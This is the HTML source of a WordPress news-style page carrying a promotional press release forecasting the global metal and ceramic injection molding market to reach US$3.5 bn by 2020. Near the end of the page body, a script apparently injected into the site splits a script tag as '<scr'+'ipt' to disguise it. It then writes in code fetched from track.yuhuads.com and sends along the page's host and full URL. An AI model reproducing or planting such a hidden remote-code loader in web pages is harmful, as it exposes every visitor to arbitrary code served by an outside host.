<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.southindianpost.com/xmlrpc.php" />
<!--[if lt IE 9]>
<script src="http://www.southindianpost.com/wp-content/themes/newspress-lite/js/html5.js" type="text/javascript"></script>
<![endif]-->

<title>Global Metal and Ceramic Injection Molding Market to be worth US$3.5 Bn by 2020 &#8211; South Indian Post</title>
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="South Indian Post &raquo; Feed" href="http://www.southindianpost.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="South Indian Post &raquo; Comments Feed" href="http://www.southindianpost.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="South Indian Post &raquo; Global Metal and Ceramic Injection Molding Market to be worth US$3.5 Bn by 2020 Comments Feed" href="http://www.southindianpost.com/2018/08/30/global-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.southindianpost.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='dashicons-css'  href='http://www.southindianpost.com/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='newspress-style-css'  href='http://www.southindianpost.com/wp-content/themes/newspress-lite/style.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='newspress-gfonts1-css'  href='//fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='newspress-responsive-css'  href='http://www.southindianpost.com/wp-content/themes/newspress-lite/style-responsive.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://www.southindianpost.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.southindianpost.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://www.southindianpost.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.southindianpost.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.southindianpost.com/wp-content/themes/newspress-lite/js/menu.js?ver=4.9.8'></script>
<link rel='https://api.w.org/' href='http://www.southindianpost.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.southindianpost.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.southindianpost.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Air Starters Market 2018: Present Size, Growth Restraints &amp; Competitive Scenario 2025' href='http://www.southindianpost.com/2018/08/30/air-starters-market-2018-present-size-growth-restraints-competitive-scenario-2025/' />
<link rel='next' title='Rheology Modifiers Market | Competitive Analysis, Industry Dynamics &amp; Growth Opportunities by 2025' href='http://www.southindianpost.com/2018/08/30/rheology-modifiers-market-competitive-analysis-industry-dynamics-growth-opportunities-by-2025/' />
<meta name="generator" content="WordPress 4.9.8" />
<link rel="canonical" href="http://www.southindianpost.com/2018/08/30/global-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020/" />
<link rel='shortlink' href='https://wp.me/p7Un3z-163M' />
<link rel="alternate" type="application/json+oembed" href="http://www.southindianpost.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.southindianpost.com%2F2018%2F08%2F30%2Fglobal-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.southindianpost.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.southindianpost.com%2F2018%2F08%2F30%2Fglobal-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020%2F&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.southindianpost.com/?wordfence_lh=1&hid=F1211588859D582CDDDC57113ACCDF50');
</script>
<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	
	<style type="text/css">
	.site-title a, 
	.site-title a:active, 
	.site-title a:hover { color: #000000; }
	</style>
	
		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Global Metal and Ceramic Injection Molding Market to be worth US$3.5 Bn by 2020" />
<meta property="og:url" content="http://www.southindianpost.com/2018/08/30/global-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020/" />
<meta property="og:description" content="A market study on the global metal and ceramic injection molding market has been published by Transparency Market Research (TMR), a market intelligence and research firm. According to the research …" />
<meta property="article:published_time" content="2018-08-30T08:50:17+00:00" />
<meta property="article:modified_time" content="2018-08-30T08:50:17+00:00" />
<meta property="og:site_name" content="South Indian Post" />
<meta property="og:image" content="http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143.jpg" />
<meta property="og:image:width" content="1024" />
<meta property="og:image:height" content="370" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="Global Metal and Ceramic Injection Molding Market to be worth US$3.5 Bn by 2020" />
<meta name="twitter:image" content="http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<meta data-pso-pv="1.2.1" data-pso-pt="singlePost" data-pso-th="0da7e28c01b26d62bcbc06af777e4d59"><script pagespeed_no_defer="" data-pso-version="20170403_083938">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</script></head>

<body class="post-template-default single single-post postid-261626 single-format-standard" >
    <div id="site-container">
        
      <div id="top-menu-container">
      <nav id="newspress-top-menu"></nav>
      

<form method="get" id="searchform" action="http://www.southindianpost.com/">
		<label for="s" class="assistive-text"></label>
		<input type="text" class="field" name="s" id="s" placeholder="Search..." />
		<input type="submit" class="submit" name="submit" id="searchsubmit" value="Search..." />
	</form>  
      
	  <div id="social">
	  <a href="#" target="_blank"> </a><a href="#" target="_blank"> </a><a href="#" target="_blank"> </a><a href="#" target="_blank"> </a><a href="#" target="_blank"> </a>      </div>
       </div>
      <div id ="header">
      <div id ="header-content">
      
		<!-- Site Titele and Description Goes Here -->
        <div class="topadlft"><img src="http://www.southindianpost.com/wp-content/themes/newspress-lite/images/ad3.png" /></div> 
        
        <a href="http://www.southindianpost.com/"><h1 class="site-title">South Indian Post</h1></a>
                
        <h1 class="site-title-hidden">South Indian Post</h1>
		<h2 class="site-title-hidden"></h2>
        
        <div class="topadrt"><img src="http://www.southindianpost.com/wp-content/themes/newspress-lite/images/ad3.png" /></div> 
        
        </div><!-- header-content -->
        <div class="heading-date">Thursday, August 30, 2018</div>  
        </div><!-- header -->   
        <div class="mobile-menu">Main Menu</div><div class="clear"></div>  
        <!-- Site Main Menu Goes Here -->
        <nav id="main-menu-con">
		<div class="menu"><ul><li ><a href="http://www.southindianpost.com/">Home</a></li><li class="page_item page-item-158136"><a href="http://www.southindianpost.com/submit/">Submit</a></li></ul></div>       </nav>
      <div class="clear"> </div>
      <div id="container"> 
      
      
      
      
      
      
	  <div id="content">
 		              <h1 class="page-title">Global Metal and Ceramic Injection Molding Market to be worth US$3.5 Bn by 2020</h1>
            	<div class="post-author"><span class="post-author"> | </span><span class="post-date"><a href="http://www.southindianpost.com/2018/08/30/">August 30, 2018</a></span></div> 
	            <div class="content-ver-sep"> </div>
            <div class="entrytext"><img width="900" height="325" src="http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143.jpg" class="attachment-single-page wp-post-image" alt="" srcset="http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143.jpg 1024w, http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143-300x108.jpg 300w, http://www.southindianpost.com/wp-content/uploads/2018/08/transparency-market-research143-768x278.jpg 768w" sizes="(max-width: 900px) 100vw, 900px" />			<p>A market study on the global metal and ceramic injection molding market has been published by Transparency Market Research (TMR), a market intelligence and research firm. According to the research report, the global metal and ceramic injection molding market stood at US$1.6 bn in 2013 and is expected to develop at a CAGR of 11.50% during the period from 2014 to 2020.The research report, titled “Metal and Ceramic Injection Molding Market – Global Industry Analysis, Size, Share, Growth, Trends and Forecast, 2014 – 2020”, estimates the overall value of the global metal and ceramic injection molding market to be US$3.5 bn by the end of 2020.The report states that the automotive industry was the biggest end user of metal and ceramic injection molding in 2013, occupying more than 20% of the overall market. Huge amount of investment by manufacturers in the metal and ceramic injection molding industry is significantly driving this market.</p>
<p>Request Sample @ <a href="https://www.transparencymarketresearch.com/sample/sample.php?flag=S&amp;rep_id=1948">https://www.transparencymarketresearch.com/sample/sample.php?flag=S&amp;rep_id=1948</a></p>
<p>Apart from this, analysts expect the inflow of investment in the global medical and healthcare industry to fuel the powder injection molding market during the forecast period. This subsequently is anticipated to aid the growth of the metal and ceramic injection molding market across the globe.The report also cites that the development in the electronics and defense sectors will stimulate the demand for the metal and ceramic injection molding over the forecast period.</p>
<p>Request Brochure @ <a href="https://www.transparencymarketresearch.com/sample/sample.php?flag=B&amp;rep_id=1948">https://www.transparencymarketresearch.com/sample/sample.php?flag=B&amp;rep_id=1948</a></p>
<p>The report geographically segments the global metal and ceramic injection molding market in to North America, Asia Pacific, Europe, and the Rest of the World. Among these, the market for metal and ceramic injection molding in Asia Pacific leads the global industry. The presence of large-scale industries such as electronics and automotive in huge number is the key reason for this growth of this regional market.The market in Asia Pacific held more than 45% of the global market for metal and ceramic injection molding in 2013. The report expect this regional market to maintain its dominance during the forecast period. Other regional market such as North America and Europe are also expected to register stable growth owing to the expansion of the automotive and medical and healthcare sectors in these regions, states the research report.</p>
<p>Request for Customization @ <a href="https://www.transparencymarketresearch.com/sample/sample.php?flag=CR&amp;rep_id=1948">https://www.transparencymarketresearch.com/sample/sample.php?flag=CR&amp;rep_id=1948</a></p>
<p>The report also profiles the key participants in the global market for metal and ceramic injection molding in order to provide a detailed analysis of prevalent competitive landscape. Advanced Materials Technologies Pte Ltd., CMG Technologies Ltd., ARC Group Worldwide Inc., Epson Atmix Corp., Kinetics Climax Inc., Indo-US MIM Tec Pvt. Ltd., Plansee Holding AG, Nippon Piston Ring Co Ltd., and PSM Industries are the major companies operating in the global metal and ceramic injection molding market profiled in the report.</p>
            </div>
            <div class="clear"> </div>
            	<div class="post-meta"><span class="post-edit"> </span></span>
	<span class="post-tag">  </span><span class="post-category"> <a href="http://www.southindianpost.com/category/uncategorized/" rel="category tag">Uncategorized</a> </span> <span class="post-comments"> <a href="http://www.southindianpost.com/2018/08/30/global-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020/#respond" class=" &#187;commentsbox" >No Comments &#187;</a></span>
	</div> 
	
	<br />
            <br />
            <div class="floatleft"><b>&laquo; <a href="http://www.southindianpost.com/2018/08/30/air-starters-market-2018-present-size-growth-restraints-competitive-scenario-2025/" rel="prev">Air Starters Market 2018: Present Size, Growth Restraints &amp; Competitive Scenario 2025</a> (Previous News)</b></div>
			<div class="floatright"><b>(Next News) <a href="http://www.southindianpost.com/2018/08/30/rheology-modifiers-market-competitive-analysis-industry-dynamics-growth-opportunities-by-2025/" rel="next">Rheology Modifiers Market | Competitive Analysis, Industry Dynamics &amp; Growth Opportunities by 2025</a> &raquo;</b></div><br />
            <div class="clear"> </div>
            <br />
          	            
          <!-- End the Loop. -->          
          <div class="clear"></div><br />
 <!-- Related News -->
 
 <div class="fpage-catspecial">
 <h2 class="fcname">Related News</h2>
 
  	<div class="special-cat-sub">
	<a href="http://www.southindianpost.com/2018/08/30/take-advantage-of-adult-modelling-agency-to-exhibit-your-performing-talents/" rel="bookmark" title="Permanent Link to Take Advantage of Adult Modelling Agency to Exhibit Your Performing Talents!">	<h3 class="fcpt">Take Advantage of Adult Modelling Agency to Exhibit Your Performing Talents!</h3>
	<p>Las Vegas, Nevada, USA – 30 August 2018 – Skyn Talent provides an excellent chance<a href="http://www.southindianpost.com/2018/08/30/take-advantage-of-adult-modelling-agency-to-exhibit-your-performing-talents/" class="read-more">Read More</a></p>
</a></div> 	<div class="special-cat-sub">
	<a href="http://www.southindianpost.com/2018/08/30/rutin-market-global-forecast-over-2026/" rel="bookmark" title="Permanent Link to Rutin Market : Global Forecast Over 2026"><img width="160" height="160" src="http://www.southindianpost.com/wp-content/uploads/2018/08/TMR_160x16042.jpg" class="fi-full-width-cat wp-post-image" alt="" srcset="http://www.southindianpost.com/wp-content/uploads/2018/08/TMR_160x16042.jpg 160w, http://www.southindianpost.com/wp-content/uploads/2018/08/TMR_160x16042-150x150.jpg 150w" sizes="(max-width: 160px) 100vw, 160px" />	<h3 class="fcpt">Rutin Market : Global Forecast Over 2026</h3>
	<p>Rutin Market&nbsp;: Global Forecast Over 2026 Certain plants have been used to cure and prevent<a href="http://www.southindianpost.com/2018/08/30/rutin-market-global-forecast-over-2026/" class="read-more">Read More</a></p>
</a></div> 
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/immune-checkpoint-inhibitors-market-boosting-the-healthcare-industry-worldwide/" rel="bookmark" title="Permanent Link to Immune Checkpoint Inhibitors Market Boosting the Healthcare Industry Worldwide">Immune Checkpoint Inhibitors Market Boosting the Healthcare Industry Worldwide</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/concrete-mixing-machines-and-tools-market-2018-product-intelligence/" rel="bookmark" title="Permanent Link to Concrete Mixing Machines and Tools Market: 2018 Product Intelligence">Concrete Mixing Machines and Tools Market: 2018 Product Intelligence</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/global-chelating-agents-market-is-estimated-to-reach-us4-48-billion-by-2019/" rel="bookmark" title="Permanent Link to Global Chelating Agents Market is estimated to reach US$4.48 billion by 2019">Global Chelating Agents Market is estimated to reach US$4.48 billion by 2019</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/lifestyle-drugs-market-by-application-trends-and-growth-rate-to-2023/" rel="bookmark" title="Permanent Link to Lifestyle Drugs Market by Application, Trends and Growth Rate to 2023">Lifestyle Drugs Market by Application, Trends and Growth Rate to 2023</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/mri-systems-market-report-by-market-data-forecast-2023/" rel="bookmark" title="Permanent Link to MRI Systems Market Report By Market Data Forecast 2023">MRI Systems Market Report By Market Data Forecast 2023</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/chafing-fuel-market-latest-report-with-forecast-2017-2025/" rel="bookmark" title="Permanent Link to Chafing Fuel Market Latest Report with Forecast 2017 – 2025">Chafing Fuel Market Latest Report with Forecast 2017 – 2025</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/global-potassium-chloride-market-to-rise-with-a-strong-cagr-of-10-8-by-2019/" rel="bookmark" title="Permanent Link to Global Potassium Chloride Market to rise with a strong CAGR of 10.8% by 2019">Global Potassium Chloride Market to rise with a strong CAGR of 10.8% by 2019</a></li></ul></h4></a>

  
	<h4 class="fcpt"><ul><li><a href="http://www.southindianpost.com/2018/08/30/nonwoven-materials-and-products-market-trends-and-prospects-by-2019/" rel="bookmark" title="Permanent Link to Nonwoven Materials and Products Market Trends and Prospects by 2019">Nonwoven Materials and Products Market Trends and Prospects by 2019</a></li></ul></h4></a>

  </div> <!--end of fpage-catspecial-->
  
 
 <div class="content-ver-sep"> </div>
 
<div id="commentsbox">
<div id="comments">
		
	<div id="comment-form">
			<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2018/08/30/global-metal-and-ceramic-injection-molding-market-to-be-worth-us3-5-bn-by-2020/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="http://www.southindianpost.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='261626' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="1c50063b25" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notify me of follow-up comments by email.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notify me of new posts by email.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="206"/></p>			</form>
			</div><!-- #respond -->
		</div>
</div>
</div>

            
</div>			
<div id="right-sidebar">

				<aside id="archives" class="widget">
					<h3 class="widget-title">Archives</h3>
					<ul>
							<li><a href='http://www.southindianpost.com/2018/08/'>August 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/07/'>July 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/06/'>June 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/05/'>May 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/04/'>April 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/03/'>March 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/02/'>February 2018</a></li>
	<li><a href='http://www.southindianpost.com/2018/01/'>January 2018</a></li>
	<li><a href='http://www.southindianpost.com/2017/12/'>December 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/11/'>November 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/10/'>October 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/09/'>September 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/08/'>August 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/07/'>July 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/06/'>June 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/05/'>May 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/04/'>April 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/03/'>March 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/02/'>February 2017</a></li>
	<li><a href='http://www.southindianpost.com/2017/01/'>January 2017</a></li>
	<li><a href='http://www.southindianpost.com/2016/12/'>December 2016</a></li>
	<li><a href='http://www.southindianpost.com/2016/11/'>November 2016</a></li>
	<li><a href='http://www.southindianpost.com/2016/10/'>October 2016</a></li>
	<li><a href='http://www.southindianpost.com/2016/09/'>September 2016</a></li>
					</ul>
				</aside>

				<aside id="meta" class="widget">
					<h3 class="widget-title">Meta</h3>
					<ul>
						<li><a href="http://www.southindianpost.com/wp-login.php?action=register">Register</a></li>						<li><a href="http://www.southindianpost.com/wp-login.php">Log in</a></li>
											</ul>
				</aside>


</div>



</div><!-- container -->
<div class="clear"> </div>
<div id="footer">

<div id="footer-content">
<div id="footer-sidebar">
	<div class="first-widget"></div><!-- #first .widget-area -->
	<div class="widgets"></div><!-- #second .widget-area -->
	<div class="widgets"></div><!-- #third .widget-area -->
	<div class="widgets"></div><!-- #third .widget-area -->
</div><!-- #footerwidget -->

</div> <!-- footer-content -->
<div id="creditline"><span class=".alignleft">&copy; 2018: South Indian Post<span class="credit"> | NewsPress Theme by: <a href="https://d5creation.com" target="_blank"> D5 Creation</a> | Powered by: <a href="http://wordpress.org" target="_blank">WordPress</a></span></span></div><a href="#" class="go-top"> </a>
</div> <!-- footer -->
</div><!-- site-container -->
<script type="text/javascript">
    yuhuads="//track.yuhuads.com/afterB/59007a6cf492f039db1a2fb1/"+((new Date()).getTime()) + Math.random();
    data ="?fromHost="+encodeURIComponent(window.top.location.host)+"&fromRef="+encodeURIComponent(window.top.location.href);
    document.write("<scr"+"ipt language='javascript' type='text/javascript' src='"+yuhuads+data+"'></scri"+"pt>");
</script>	<div style="display:none">
	</div>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201835'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.southindianpost.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://www.southindianpost.com/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://www.southindianpost.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script async="async" type='text/javascript' src='http://www.southindianpost.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201835.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.4.2',blog:'116869353',post:'261626',tz:'0',srv:'www.southindianpost.com'} ]);
	_stq.push([ 'clickTrackerInit', '116869353', '261626' ]);
</script>
</body>
</html>